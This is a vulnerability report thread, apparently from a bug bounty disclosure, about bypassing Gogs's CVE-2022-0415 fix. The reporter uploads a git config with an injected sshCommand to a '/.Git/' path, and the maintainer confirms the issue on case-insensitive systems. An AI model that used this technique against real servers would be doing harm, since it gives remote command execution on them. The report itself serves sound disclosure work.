Bypass to Remote Command Execution in uploading repository file in gogs/gogs
Jun 6th 2022
I find a bypass for CVE-2022-0415 and previous fixs.
In the fix of CVE-2022-0415, gogs filter
/.Git/ can bypass this and upload successfully
Proof of Concept
Create a repository in Gogs, upload a file config to the repository on the web page:
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = firstname.lastname@example.org:torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
Intercept the HTTP POST form submitting request, and set parameter to tree_path=
/.Git/ in request body.
Then a file with text pwnned is created in
host in a github repo
https://github.com/cokeBeer/test with name
This vulnerability is capable of executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.
Thanks for the report!
Could you confirm what systems are affected?
I tested in the latest version of gogs docker images , so linux are affected.
Can you record a video for the poc on Linux systems? We weren't able to reproduce it on Linux.
Though can confirm Windows and macOS are affected because path case-insensitive.
Add video file link in the report, download to play it. I think this way is faster then uploading to video website which always need check.
Thanks for the video!
We're still not able to reproduce it on Linux, where
.Git directory is simply treated as a regular content directory. In the poc video, there is also no evidence showing the
/tmp/poc is created during the recording of video.
Could you record a video starting from a fresh installation of a fresh pull of gogs/gogs?
Seems problem doesn't come from the way I operate. the docker's data dir is mounted on my MacOS system and may share the case insensitive feature.
So just exclude Linux. By the way, I found some bugs claimed to be fixed in gogs's changelog but actually exist in latest version. How can I get in contact without messing the comment of this report?
Sounds good, marking as valid.
To file bug reports, please go https://github.com/gogs/gogs/issues/new/choose